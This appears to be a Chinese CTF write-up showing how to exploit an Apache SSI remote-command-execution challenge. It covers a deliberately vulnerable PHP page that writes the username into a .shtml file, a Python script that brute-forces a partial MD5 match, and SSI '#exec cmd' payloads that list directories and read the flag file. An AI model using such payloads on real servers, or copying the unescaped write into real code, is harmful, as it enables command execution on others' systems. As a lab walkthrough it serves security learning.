知识点:Apache SSI漏洞
Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞
Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞
Apache SSI 远程命令执行漏洞 - MCY5 - 博客园
1.开题:
看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的,
2.贴源码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
审计代码,代码中
判断条件下进入
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
password经过md5加密后的前6位字符为6d0bc1
代码中提到shtml,其实就应该想到和Apache SII有关
3.写脚本,生成password
import hashlib
for i in range(10000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] =='6d0bc1':
print(i)
print(a)
运行python后:
2020666
6d0bc1153791aa2b4e18b4f344f26ab4
2305004
6d0bc1ec71a9b814677b85e3ac9c3d40
9162671
6d0bc11ea877b37d694b38ba8a45b19c
4.随便填个用户名,密码选择上面三个中的一个进行登录,抓包
抓到隐藏页面,
添加XFF,没有变化
5.回看代码
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
将username的值传到text,再将text内容写到shtml文件,shtml文件是在public路径下,名字为get_hash()后的shtml文件
令username=<!--#exec cmd=”ls” -->
查看该shtml文件
emm,不对
next:
<!--#exec%20cmd%3d"ls%20../"%20-->
next:
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->